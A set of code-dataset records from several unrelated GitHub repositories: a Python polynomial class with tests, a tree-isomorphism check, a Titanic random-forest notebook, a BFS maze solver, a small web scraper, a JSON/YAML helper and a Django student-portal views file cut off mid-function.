        \"\"\" The representation of the object is the same as its string format \"\"\"\n        return self.__str__()\n\n    def __str__(self):\n        \"\"\" Convert the polynomial, stored as a list of coefficients, into its string form \"\"\"\n        join_with = {\n            (True, True): '-',\n            (True, False): '',\n            (False, True): ' - ',\n            (False, False): ' + '\n        }\n\n        result = []\n        for power, coeff in reversed(list(enumerate(self.polynomial))):\n            if coeff == 0:\n                continue\n            join = join_with[not result, coeff < 0]\n            coeff = abs(coeff)\n            if coeff == 1 and power != 0:\n                coeff = ''\n\n            f = {0: '{}{}', 1: '{}{}x'}.get(power, '{}{}x^{}')\n\n            result.append(f.format(join, coeff, power))\n\n        return ''.join(result) or '0'\n    \n    def __eq__(self, other): \n        \"\"\" Compare two polynomial objects via their string forms \"\"\"\n        return self.__str__() == other.__str__()\n    \n\n    def __add__(self,other):\n        \"\"\" Add two polynomials \"\"\"\n        len_self = len(self.polynomial)\n        len_other = len(other.polynomial)\n        if len_self >= len_other:\n            sum = list(self.polynomial)\n            for power,coeff in list(enumerate(other.polynomial)):\n                sum[power] = sum[power] + other.polynomial[power]\n        else:\n            sum = list(other.polynomial)\n            for power,coeff in list(enumerate(self.polynomial)):\n                sum[power] = sum[power] + self.polynomial[power]\n\n        return Polynomial(sum)\n\n    def derivative(self):\n        \"\"\" Return the derivative of the polynomial \"\"\"\n        if len(self.polynomial) == 1:\n            return Polynomial(0)\n        der = [ self.polynomial[i] * i for i in range(1,len(self.polynomial))]\n\n        return Polynomial(der)\n\n    def at_value(self,value,second_value=None):\n        \"\"\" Evaluate the polynomial at value using Horner's method; with a second value, return the difference of the two evaluations \"\"\" \n        if second_value is not None:\n            return self.at_value(second_value) - self.at_value(value) \n        p = self.polynomial[-1]\n        for i in range(len(self.polynomial)-2,-1,-1):\n            p = p * value + self.polynomial[i]\n\n        return p\n\n    def multiply(self,a):\n        \"\"\" Helper method used by __pow__ to multiply the polynomial by the coefficient list a \"\"\"\n        c = [0]*(len(a) + len(self.polynomial)-1)\n\n        for i in range(len(a)):\n            ai = a[i]\n            for j in range(len(self.polynomial)):\n                c[i + j] += ai * self.polynomial[j]\n\n        return c\n\n    def __pow__(self, n):\n        \"\"\" Raise the polynomial to the n-th power \"\"\"\n        a = [1]\n        for i in range(n):\n            a = self.multiply(a)\n        return Polynomial(a)\n    \n\ndef test():\n    assert str(Polynomial(0,1,0,-1,4,-2,0,1,3,0)) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x\"\n    assert str(Polynomial([-5,1,0,-1,4,-2,0,1,3,0])) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x - 5\"\n    assert str(Polynomial(x7=1, x4=4, x8=3, x9=0, x0=0, x5=-2, x3= -1, x1=1)) == \"3x^8 + x^7 - 2x^5 + 4x^4 - x^3 + x\"\n    assert str(Polynomial(x2=0)) == \"0\"\n    assert str(Polynomial(x0=0)) == \"0\"\n    assert Polynomial(x0=2, x1=0, x3=0, x2=3) == Polynomial(2,0,3)\n    assert Polynomial(x2=0) == Polynomial(x0=0)\n    assert str(Polynomial(x0=1)+Polynomial(x1=1)) == \"x + 1\"\n    assert str(Polynomial([-1,1,1,0])+Polynomial(1,-1,1)) == \"2x^2\"\n    pol1 = Polynomial(x2=3, x0=1)\n    pol2 = Polynomial(x1=1, x3=0)\n    assert str(pol1+pol2) == \"3x^2 + x + 1\"\n    assert str(pol1+pol2) == \"3x^2 + x + 1\"\n    assert str(Polynomial(x0=-1,x1=1)**1) == \"x - 1\"\n    assert str(Polynomial(x0=-1,x1=1)**2) == \"x^2 - 2x + 1\" \n    pol3 = Polynomial(x0=-1,x1=1)\n    assert str(pol3**4) == \"x^4 - 4x^3 + 6x^2 - 4x + 1\"\n    assert str(pol3**4) == \"x^4 - 4x^3 + 6x^2 - 4x + 1\"\n    assert str(Polynomial(x0=2).derivative()) == \"0\"\n    assert str(Polynomial(x3=2,x1=3,x0=2).derivative()) == \"6x^2 + 3\"\n    assert str(Polynomial(x3=2,x1=3,x0=2).derivative().derivative()) == \"12x\"\n    pol4 = Polynomial(x3=2,x1=3,x0=2)\n    assert str(pol4.derivative()) == \"6x^2 + 3\"\n    assert str(pol4.derivative()) == \"6x^2 + 3\"\n
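    # Worked illustration of the Horner scheme used by at_value (an added note, not an\n    # original test case): for 3x^2 - 2x - 1 at x = 3 the loop computes p = 3, then\n    # p = 3*3 + (-2) = 7, then p = 7*3 + (-1) = 20, matching the assertion below.\n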
    assert Polynomial(-2,3,4,-5).at_value(0) == -2\n    assert Polynomial(x2=3, x0=-1, x1=-2).at_value(3) == 20\n    assert Polynomial(x2=3, x0=-1, x1=-2).at_value(3,5) == 44\n    pol5 = Polynomial([1,0,-2])\n    assert pol5.at_value(-2.4) == -10.52\n    assert pol5.at_value(-2.4) == -10.52\n    assert pol5.at_value(-1,3.6) == -23.92\n    assert pol5.at_value(-1,3.6) == -23.92\n\nif __name__ == '__main__':\n    test()\n","repo_name":"mkosiarc/isj_school","sub_path":"isj_proj05.py","file_name":"isj_proj05.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72023556323","text":"class Node:\n\tdef __init__(self,data):\n\t\tself.data = data\n\t\tself.left = None\n\t\tself.right = None\ndef isoMorphic(n1,n2):\n\tif n1 is None and n2 is None:\n\t\treturn True\n\tif n1 is None or n2 is None:\n\t\treturn False\n\tif n1.data != n2.data :\n\t\treturn False\n\n\treturn (isoMorphic(n1.left,n2.left) and isoMorphic(n1.right,n2.right)) or (isoMorphic(n1.left,n2.right) and isoMorphic(n1.right,n2.left))\t\n\n# Driver program to test above function\nn1 = Node(1)\nn1.left = Node(2)\nn1.right = Node(3)\nn1.left.left = Node(4)\nn1.left.right = Node(5)\nn1.right.left = Node(6)\nn1.left.right.left = Node(7)\nn1.left.right.right = Node(8)\n \nn2 = Node(1)\nn2.left = Node(3)\nn2.right = Node(2)\nn2.right.left = Node(4)\nn2.right.right = Node(5)\nn2.left.right = Node(6)\nn2.right.right.left = Node(8)\nn2.right.right.right = Node(7)\n\nprint(isoMorphic(n1,n2))\n\n\n","repo_name":"damayant/Python","sub_path":"isometric.py","file_name":"isometric.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15694717625","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### Random Forest Classifier is used in this Kernel. Dashboard score is 0.78468
\n\n# In[262]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nget_ipython().magic(u'matplotlib inline')\nsns.set()\nimport re\n#Sklearn OneHot Encoder to Encode categorical integer features\nfrom sklearn.preprocessing import OneHotEncoder\n#Sklearn train_test_split to split a set on train and test \nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split # for old sklearn version use this to split a dataset \n# Random Forest Classifier from sklearn\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\n\n\n# In[385]:\n\n\n#Import the training and test data sets\ndata = pd.read_csv('../input/train.csv')\ntest = pd.read_csv('../input/test.csv')\ndata.head()\n\n\n# In[386]:\n\n\ndata.isnull().sum()\n\n\n# In[387]:\n\n\ntest.isnull().sum()\n\n\n# In[388]:\n\n\n#Construct an X matrix\nx_train = data[['Name', 'Pclass','Sex','Age','Parch','SibSp','Embarked', 'Fare', 'Cabin', 'Survived']].copy()\nx_test = test[['Name', 'Pclass','Sex','Age','Parch','SibSp','Embarked', 'Fare', 'Cabin']].copy()\nx_train.shape, x_test.shape\n\n\n# In[389]:\n\n\nPassengerID = np.array(test['PassengerId'])\n\n\n# ## Embarked data\n\n# In[390]:\n\n\nprint(x_train.Embarked.unique())\nprint(x_test.Embarked.unique())\nset(x_train.Embarked.unique()) == set(x_test.Embarked.unique()) # Check that the train and test values match\n\n\n# So there are NaN values in the train data (only 2 rows, as we saw earlier), so let's drop them\n\n# In[391]:\n\n\nx_train = x_train.dropna(subset=['Embarked'],axis=0)\n\n\n# In[392]:\n\n\nprint(x_train.Embarked.unique())\nset(x_train.Embarked.unique())==set(x_test.Embarked.unique()) # Check that the train and test values match\n\n\n# Replace these values with (0, 1, 2)\n\n# In[393]:\n\n\nx_train.Embarked = pd.factorize(x_train.Embarked)[0]\nx_test.Embarked = pd.factorize(x_test.Embarked)[0]\n\n\n# In[394]:\n\n\nx_train.head()\n\n\n# ## Sex data\n\n# There are no missing values, so factorize these values (0, 1)\n\n# In[395]:\n\n\nx_train.Sex = pd.factorize(x_train.Sex)[0]\nx_test.Sex = pd.factorize(x_test.Sex)[0]\n\n\n# ## Sibsp and Parch data\n# #### We should be careful with these features to avoid overfitting the model. Let's create a Family feature, which shows the family size, and a feature which shows whether a passenger is alone\n\n# In[396]:\n\n\nx_train['Family'] = x_train['SibSp'] + x_train['Parch']\nx_test['Family'] = x_test['SibSp'] + x_test['Parch']\n\nx_train['Alone'] = x_train['Family'].map(lambda x: 1 if x==0 else 0)\nx_test['Alone'] = x_test['Family'].map(lambda x: 1 if x==0 else 0)\n\n
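\n# A quick sanity check of the new features (an added illustrative cell, not part of the original kernel)\n\n# In[ ]:\n\n\nx_train[['Family', 'Alone']].head()\n\n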
\n# ## Age data\n\n# ### I am going to categorize these data first and then factorize them. But before that, let's define how to bucket the Ages, which intervals will be most useful, and how to deal with missing values\n\n# In[397]:\n\n\n# Find the mean Age over the combined train and test data\nage = pd.concat([x_test.Age, x_train.Age], axis=0)\n\n\n# In[398]:\n\n\nmean = age.mean()\n\n\n# In[399]:\n\n\n# Flag the rows with missing Age in a special column\nx_train['Missed_Age'] = x_train['Age'].map(lambda x: 1 if pd.isnull(x) else 0)\nx_test['Missed_Age'] = x_test['Age'].map(lambda x: 1 if pd.isnull(x) else 0)\n\n\n# In[400]:\n\n\n# Fill all missing age values with the mean Age\nx_train['Age'] = x_train['Age'].fillna(mean)\nx_test['Age'] = x_test['Age'].fillna(mean)\n\n\n# In[401]:\n\n\ndata[data.Survived==1].Age.plot.hist(alpha=0.5,color='blue',stacked=True, bins=50)\ndata[data.Survived==0].Age.plot.hist(alpha=0.5,color='red', stacked=True, bins=50)\nplt.legend(['Survived','Died'])\nplt.show()\n\n\n# In[402]:\n\n\nsns.countplot(x=\"Survived\", data=data[data['Age'].isnull()])\n\n\n# In[403]:\n\n\nsns.countplot(x=\"Survived\", data=data[data['Age'].isnull()], hue='Pclass')\n\n\n# In[404]:\n\n\ndef process_age(df,cut_points,label_names):\n    df[\"Age\"] = pd.cut(df[\"Age\"],cut_points,labels=label_names)\n    return df\n\ncut_points = [-1,0,5,16,100] \nlabel_names = [0,1,2,3]\n\nx_train = process_age(x_train,cut_points,label_names)\nx_test = process_age(x_test,cut_points,label_names)\n\n\n# In[405]:\n\n\nset(x_train['Age'].unique()) == set(x_test['Age'].unique())\n\n\n# In[406]:\n\n\nx_train.head()\n\n\n# ## Fare data\n\n# In[407]:\n\n\n# Fill the one missing fare in the test set with the mean Fare for that class\nx_test.loc[x_test['Fare'].isnull()]['Pclass'] # determine a Class for this passenger\n\n\n# In[408]:\n\n\n# Find the mean Fare for Class 3\nfare_mean = pd.concat([x_train.loc[x_train['Pclass']==3]['Fare'], x_test.loc[x_test['Pclass']==3]['Fare']], axis=0).mean()\n\n\n# In[409]:\n\n\n# Fill the data gap\nx_test['Fare'] = x_test['Fare'].fillna(fare_mean)\n\n\n# In[410]:\n\n\nx_test.isnull().sum()\n\n\n# In[411]:\n\n\nx_train['Fare'] = (x_train['Fare']/20).astype('int64')\nx_test['Fare'] = (x_test['Fare']/20).astype('int64')\n\n\n# In[412]:\n\n\nset(x_train['Fare'].unique()) == set(x_test['Fare'].unique()) # Check the train and test data identity\n\n\n# ## Cabin data\n\n# In[413]:\n\n\n# There are a lot of missing values, so let's just check whether a passenger has a Cabin number or not\n\n\n# In[414]:\n\n\nx_train['Missed_Cabin'] = x_train['Cabin'].map(lambda x: 0 if pd.isnull(x) else 1)\nx_test['Missed_Cabin'] = x_test['Cabin'].map(lambda x: 0 if pd.isnull(x) else 1)\n\n\n# Also we can see that some passengers have several cabin numbers; let's make a special column where a missing cabin is zero, \n# and otherwise the value is the number of cabins\n\n# In[415]:\n\n\nx_train['Cabin_num'] = x_train['Cabin'].map(lambda x: 0 if pd.isnull(x) else len(x.split()))\nx_test['Cabin_num'] = x_test['Cabin'].map(lambda x: 0 if pd.isnull(x) else len(x.split()))\n\n\n# In[416]:\n\n\nx_train.head()\n\n\n# ## Name data\n\n# In[417]:\n\n\n# Let's try to extract the Title from the name using a regular expression\nx_train['Title'] = x_train['Name'].map(lambda x: str(re.findall(\"^.*[, ](.*)[.] *\", x)[0]))
x_test['Title'] = x_test['Name'].map(lambda x: str(re.findall(\"^.*[, ](.*)[.] *\", x)[0]))\n\n\n# In[418]:\n\n\nx_train['Title'].unique()\n\n\n# By the way - Wiki: Count (male) or countess (female) is a title in European countries for a noble of varying status, but historically deemed to convey an approximate rank intermediate between the highest and lowest titles of nobility\n\n# In[419]:\n\n\nsns.countplot(x=\"Title\", data=x_train)\n\n\n# In[420]:\n\n\nx_train.Title = pd.factorize(x_train.Title)[0]\nx_test.Title = pd.factorize(x_test.Title)[0]\n\n\n# In[421]:\n\n\nx_train.head()\n\n\n# Let's also compute the length of the name\n\n# In[422]:\n\n\nx_train['Name_Len_char'] = x_train['Name'].map(lambda x: len(x))\nx_train['Name_Len_words'] = x_train['Name'].map(lambda x: len(x.split()))\n\nx_test['Name_Len_char'] = x_test['Name'].map(lambda x: len(x))\nx_test['Name_Len_words'] = x_test['Name'].map(lambda x: len(x.split()))\n\n\n# In[423]:\n\n\nx_train.head()\n\n\n# Create a Y-array with the Survived values\n\n# In[424]:\n\n\n#Create Y array\ny = np.array(x_train[['Survived']])\nprint(y.shape)\n\n\n# Drop Columns which we do not need\n\n# In[425]:\n\n\nx_train=x_train.drop(['SibSp', 'Parch', 'Name', 'Cabin', 'Survived'], axis=1)\nx_test=x_test.drop(['SibSp', 'Parch', 'Name', 'Cabin'],axis=1)\n\n\n# In[426]:\n\n\nx_train.head()\n\n\n# Create Test and Train sets\n\n# In[430]:\n\n\nxn_train, xn_test, yn_train, yn_test = train_test_split(x_train, y, test_size=0.3, random_state=32)\nxn_train.shape, xn_test.shape, yn_train.shape, yn_test.shape\n\n\n# In[431]:\n\n\n# We could optimize the parameters using a special function in sklearn, but here I will do it manually\nC=np.array([100,150,200,250,300,350,400,450,500,550,600,650,700,750])\nscores = np.zeros(C.shape)\nfor i in range (len(C)):\n    clf = RandomForestClassifier(n_estimators = int(C[i]), max_depth=10, random_state=0, criterion='entropy') \n    clf.fit(xn_train, yn_train) \n    scores[i] = clf.score(xn_test,yn_test)\n\n\n# In[432]:\n\n\nind = np.unravel_index(np.argmax(scores, axis=None), scores.shape)\nprint('max Score = ',scores[ind],'\\noptimal C = ',C[ind])\n\n\n# In[433]:\n\n\nclf = RandomForestClassifier(n_estimators = 150, max_depth=10, random_state=0, criterion='entropy') \nclf.fit(xn_train, yn_train) \nprint(clf.score(xn_train,yn_train))\nprint(clf.score(xn_test,yn_test))\n\n\n# In[434]:\n\n\nimportance = clf.feature_importances_\n\n\n# In[435]:\n\n\nimportance = pd.DataFrame(importance, index=x_test.columns, \n                          columns=[\"Importance\"])\n\n\n# In[436]:\n\n\nprint(importance)\n\n\n# In[381]:\n\n\nclf = RandomForestClassifier(n_estimators = 100, max_depth=10, random_state=0, criterion='entropy') \nclf.fit(x_train, y) \nprediction = clf.predict(x_test)\n\n\n# In[382]:\n\n\nprint(clf.score(xn_train,yn_train))\nprint(clf.score(xn_test,yn_test))\nprint(clf.score(x_train,y))\n\n\n# In[383]:\n\n\n# Submit the result\n\nsubmission_df = {\"PassengerId\": PassengerID,\n                 \"Survived\": prediction}\nsubmission = pd.DataFrame(submission_df)\n\n\n# In[384]:\n\n\nsubmission.to_csv(\"submission.csv\",index=False)\n\n","repo_name":"nischalshrestha/automatic_wat_discovery","sub_path":"Notebooks/py/fornitroll/random-forest-rev0/random-forest-rev0.py","file_name":"random-forest-rev0.py","file_ext":"py","file_size_in_byte":8826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"13107978652","text":"import unittest\nfrom collections import deque\n\n\ndef solution(A, sr, sc):\n    q = deque([])\n    q.append((sr, sc, 0))\n    visited = [[0] * len(A[0]) for i in range(len(A))]\n
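    # Direction vectors, traversed in order: right, down, left, up\n    # (paired as (dr[i], dc[i]) = (0, 1), (1, 0), (0, -1), (-1, 0)).\n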
    dr = [0, 1, 0, -1]\n    dc = [1, 0, -1, 0]\n\n    while q:\n        r, c, lvl = q.popleft()\n\n        if A[r][c] == 'E':\n            return lvl\n\n        visited[r][c] = 1\n        examine_neighbors(A, visited, q, r, c, lvl, dr, dc)\n\n    return -1\n\n\ndef examine_neighbors(A, visited, q, r, c, lvl, dr, dc):\n    for i in range(len(dr)):\n        new_r = r + dr[i]\n        new_c = c + dc[i]\n\n        if new_r < 0 or new_r >= len(A) or new_c < 0 or new_c >= len(A[0]) or A[new_r][new_c] == '#' or visited[new_r][new_c]:\n            continue\n\n        # Mark on enqueue so the same cell cannot be added to the queue twice.\n        visited[new_r][new_c] = 1\n        q.append((new_r, new_c, lvl + 1))\n\n\nclass Test(unittest.TestCase):\n    def test_solution(self):\n        grid = [['.', '.', '.', '#', '.', '.', '.'],\n                ['.', '#', '.', '.', '.', '#', '.'],\n                ['.', '#', '.', '.', '.', '.', '.'],\n                ['.', '.', '#', '#', '.', '.', '.'],\n                ['#', '.', '#', 'E', '.', '#', '.']]\n\n        self.assertEqual(9, solution(grid, 0, 0),\n                         \"Should return the correct shortest number of steps to escape the maze\")\n\n        grid = [['.', '.', '.', '#', '.', '.', '.'],\n                ['.', '#', '.', '.', '.', '#', '.'],\n                ['.', '#', '.', '.', '.', '.', '.'],\n                ['.', '.', '#', '#', '#', '.', '.'],\n                ['#', '.', '#', 'E', '.', '#', '.']]\n\n        self.assertEqual(-1, solution(grid, 0, 0),\n                         \"Should return -1 if there is no way to escape the maze\")","repo_name":"DKNY1201/programming-python","sub_path":"DFS-BFS/ShortestStepsToReachEscapeMaze.py","file_name":"ShortestStepsToReachEscapeMaze.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73416042723","text":"import requests\nimport json\nimport csv\nfrom bs4 import BeautifulSoup\n\ncountries = []\nurl = \"https://www.womenonwaves.org/en/map/country\"\nr = requests.get(url)\n\nsoup = BeautifulSoup(r.text, \"html.parser\")\n\nfor country in soup.find_all(\"div\", class_=\"list-item-country\"):\n    country_obj = {}\n    link = country.find(\"a\")\n    country_obj['name'] = link.get_text().strip()\n    country_obj['link'] = link.get(\"href\")\n    country_obj['color'] = link.get(\"style\")\n    if country_obj['color']:\n        country_obj['color'] = country_obj['color'].split(\":\")[1].strip()\n    countries.append(country_obj)\n\ncount = 0\nwith open('countries.csv', 'w') as csv_file:\n    csv_writer = csv.writer(csv_file)\n    for country in countries:\n        if count == 0:\n            # Write the header row from the dict keys on the first pass.\n            csv_writer.writerow(country.keys())\n            count += 1\n        csv_writer.writerow(country.values())\n        \nprint(json.dumps(countries, indent=2))\n","repo_name":"yuletide/womenonwaves_map","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18061126827","text":"from zope.interface import implements\nfrom repoze.bfg.security import (\n    Everyone,\n    Allow,\n    Deny,\n    ALL_PERMISSIONS,\n)\nfrom bda.bfg.app.model import (\n    AdapterNode,\n    Properties,\n    BaseMetadata,\n    BaseNodeInfo,\n    registerNodeInfo,\n)\nfrom bda.bfg.ugm.model.interfaces import IUser\n\nclass User(AdapterNode):\n    \n    implements(IUser)\n    \n    node_info_name = 'user'\n    \n    __acl__ = [\n        (Allow, 'group:authenticated', 'view'),\n        (Allow, 'group:authenticated', 'edit'),\n        (Allow, Everyone, 'login'),\n        (Deny, Everyone, ALL_PERMISSIONS),\n    ]\n    \n    @property\n    def properties(self):\n        props = Properties()\n        props.editable = True\n        return props\n    \n    @property\n    def metadata(self):\n        metadata = BaseMetadata()\n        metadata.title = \"User\"\n        metadata.description = \"User\"\n        return metadata\n    \n    def __call__(self):\n        self.model()\n\ninfo = BaseNodeInfo()\ninfo.title = 'User'\ninfo.description = 'User'\ninfo.node = User\n
info.addables = []\nregisterNodeInfo('user', info)","repo_name":"bluedynamics/bda.bfg.ugm","sub_path":"src/bda/bfg/ugm/model/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5143007015","text":"import yaml\nimport json\n\n'''\nSmall helpers for reading JSON/YAML files into dicts and converting JSON to YAML.\n'''\ndef read_json_to_dict(path)->dict:\n    with open(path,encoding=\"utf-8\") as f:\n        return json.load(f)  # returns a dict directly\n\ndef read_yaml_to_dict(path)->dict:\n    with open(path,encoding=\"utf-8\") as f:\n        return yaml.full_load(f)\n\ndef json_to_yaml(path):\n    with open(path,encoding=\"utf-8\") as f:\n        y=yaml.dump(json.load(f))  # yaml.dump returns a YAML string\n        print(\"yaml.dump(json.load(f)) type:\",type(y))\n        return y\n\n\n\nif __name__==\"__main__\":\n    js_path=\"../data/read_file_test/test_json.json\"\n    yaml_path=\"../data/read_file_test/pmf.yaml\"\n    print(\"Json To Dict: \",read_json_to_dict(js_path))\n    print(\"YAML To Dict: \",read_yaml_to_dict(yaml_path))\n    print(\"Json TO Yaml: \",json_to_yaml(js_path))\n","repo_name":"colagold/DataAnalysisAndVisualization","sub_path":"process/json_yaml_dict.py","file_name":"json_yaml_dict.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10540666801","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom . forms import UserRegistrationForm, VoteForm\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import date\nfrom datetime import datetime\nfrom django.contrib.auth import authenticate, login\nfrom .models import OtherRequests, UserInfo, AvailableCourses, Enrollment, Fees, Voting, UserVotes\nfrom posts.models import Post, PostLikes, Comments\nfrom django.db.models import Q\nfrom django.contrib.auth.models import User\nimport random\nfrom django.core.paginator import Paginator\n\n\n# Create your views here.\n\ndef register(request):\n    \n    if request.user.is_authenticated:\n        return redirect('dashboard')\n\n    form = UserRegistrationForm()\n    if request.method == 'POST':\n        form = UserRegistrationForm(request.POST) \n\n        if form.is_valid():\n            username = form.cleaned_data.get('username')\n\n\n            new_user = form.save()\n\n            new_user = authenticate(username=form.cleaned_data['username'],\n                                    password=form.cleaned_data['password1'],\n                                    )\n            login(request, new_user)\n            \n            degree_title = ['bscs', 'bba', 'bms', 'bfd']\n\n            student_degree_title = random.choice(degree_title)\n            \n            user_model = User.objects.get(username=username)\n\n            new_profile = UserInfo.objects.create(user=user_model, degree_title=student_degree_title)\n            new_profile.save()\n\n\n\n            new_user_fees = Fees.objects.create(user=user_model, enrollment_fees=5000, monthly_fees = 2000, balance=7000)\n            new_user_fees.save()\n            \n            messages.success(request, f\"Account created for {username}\")\n\n            return redirect('dashboard')\n        \n        else:\n            form = UserRegistrationForm()\n            messages.warning(request, f'Please enter the correct information')\n            return render(request, 'users/register.html', {'form': form })\n        \n    return render(request, 'users/register.html', {'form': form })\n\n@login_required(login_url='student_login')\ndef dashboard(request):\n    user_profile = UserInfo.objects.get(user=request.user)\n    if user_profile.is_teacher ==True:\n        messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n        return redirect('teacher_dashboard') \n\n    else:\n        today = date.today()\n        now = datetime.now()\n\n\n\n        
fees_object = Fees.objects.get(user=request.user)\n likes = PostLikes.objects.filter(user=request.user)\n comments = Comments.objects.all()\n\n p = Paginator(Post.objects.all().order_by('-id'), 8)\n page = request.GET.get('page')\n posts = p.get_page(page)\n\n current_time = now.strftime(\"%H:%M:%S\")\n \n return render(request, 'users/dashboard.html', {'today':today, 'current_time': current_time, \n 'user_profile':user_profile, 'fees_object':fees_object, 'posts':posts, 'likes':likes,\n 'comments':comments,})\n\n@login_required(login_url='student_login')\ndef request(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n\n\n if request.method == 'POST':\n\n username = request.POST['username']\n subject = request.POST['subject']\n content = request.POST['content']\n\n new_request = OtherRequests.objects.create(user= username, subject=subject, content=content)\n new_request.save()\n\n\n\n messages.success(request, f\"Your request has been sent!\")\n return redirect('request')\n \n\n \n return render(request, 'users/request.html', {'user_profile': user_profile, 'today':today, 'current_time': current_time})\n\n\n@login_required(login_url='student_login')\ndef view_requests(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n\n\n current_user = request.user\n\n current_user_object = OtherRequests.objects.filter(user=current_user).order_by('-id')\n \n\n\n return render(request, 'users/view_requests.html', {'user_profile': user_profile, 'today':today, 'current_time': current_time, 'current_user_object': current_user_object})\n\n\n\n\n\n@login_required(login_url='student_login')\ndef profile(request, u):\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n\n \n\n \n return render(request, 'users/profile.html', {'user_profile':user_profile, 'today':today, 'current_time': current_time})\n\n\n@login_required(login_url='student_login')\ndef settings(request):\n\n user_profile = UserInfo.objects.get(user=request.user)\n if user_profile.is_teacher ==True:\n messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n return redirect('teacher_dashboard') \n\n else:\n today = date.today()\n now = datetime.now()\n\n current_time = now.strftime(\"%H:%M:%S\")\n \n\n if request.method == 'POST':\n if request.FILES.get('image') == None:\n user = request.user.username\n address = request.POST['address']\n contact = request.POST['contact']\n image = user_profile.profile_img\n\n user_profile.address = address\n user_profile.contact = contact\n user_profile.profile_img = image\n\n user_profile.save()\n\n messages.success(request, f\"Information saved\")\n\n return redirect('settings')\n \n\n \n else:\n user 
= request.user.username\n                address = request.POST['address']\n                contact = request.POST['contact']\n                image = request.FILES.get('image')\n\n                user_profile.user = request.user\n                user_profile.address = address\n                user_profile.contact = contact\n                user_profile.profile_img = image\n\n                user_profile.save()\n\n                messages.success(request, f\"Information saved\")\n\n                return redirect('settings')\n\n        \n        return render(request, \"users/settings.html\", {'user_profile':user_profile, 'today':today, 'current_time':current_time})\n\n\n\n@login_required(login_url='student_login')\ndef delete_course(request):\n\n    if request.method == 'POST':\n        course = request.POST['delete_course']\n\n        delete_course = Enrollment.objects.get(user=request.user, course_name = course)\n        delete_course.delete()\n\n        messages.warning(request, f\"{course} dropped\")\n\n        return redirect(\"enrollment\")\n    \n    return redirect(\"enrollment\")\n\n    \n\n\n\n@login_required(login_url='student_login')\ndef fees(request):\n\n    user_profile = UserInfo.objects.get(user=request.user)\n    if user_profile.is_teacher ==True:\n        messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n        return redirect('teacher_dashboard') \n\n    else:\n        today = date.today()\n        now = datetime.now()\n        current_time = now.strftime(\"%H:%M:%S\")\n\n        fees_object = Fees.objects.filter(user=request.user)\n\n\n        if request.method == 'POST':\n\n            fees_payment = Fees.objects.get(user=request.user)\n            paid_fees = int(request.POST['payment'])\n            \n\n            fees_payment.paid = fees_payment.paid + paid_fees\n            fees_payment.balance = fees_payment.balance - paid_fees\n\n            fees_payment.save()\n\n            messages.info(request, f\"Thank you for your payment of {paid_fees}\")\n\n\n        return render(request, \"users/fees.html\" , {'user_profile':user_profile, 'today':today, 'current_time': current_time, 'fees_object': fees_object})\n\n\n@login_required(login_url='student_login')\ndef online_class(request):\n    user_profile = UserInfo.objects.get(user=request.user)\n    if user_profile.is_teacher ==True:\n        messages.warning(request, \"You are logged in as a teacher and trying to access student's portal\")\n        return redirect('teacher_dashboard') \n\n    else:\n        today = date.today()\n        now = datetime.now()\n        current_time = now.strftime(\"%H:%M:%S\")\n        class_time = \"no\"\n        hour = int(now.strftime(\"%H\"))\n\n\n        if Enrollment.objects.filter(user=request.user):\n            user_enrollments = Enrollment.objects.filter(user=request.user)\n            for enrollment in user_enrollments:\n\n                if enrollment.course_time == 'morning' and hour >8 and hour <12:\n                    class_time = \"yes\"\n                    shift_course = Enrollment.objects.get(course_time = 'morning', user=request.user)\n\n                    return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n                     'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n\n\n\n                elif enrollment.course_time == 'afternoon' and hour >11 and hour <15:\n                    class_time = \"yes\"\n                    shift_course = Enrollment.objects.get(course_time = 'afternoon', user=request.user)\n\n                    return render(request, \"users/online_class.html\", {'user_profile': user_profile,\n                     'today':today, 'current_time': current_time,'class_time': class_time, 'shift_course': shift_course})\n\n\n\n\n                elif enrollment.course_time == 'evening' and hour >14 and hour <18:\n                    class_time = \"yes\"\n                    shift_course = 
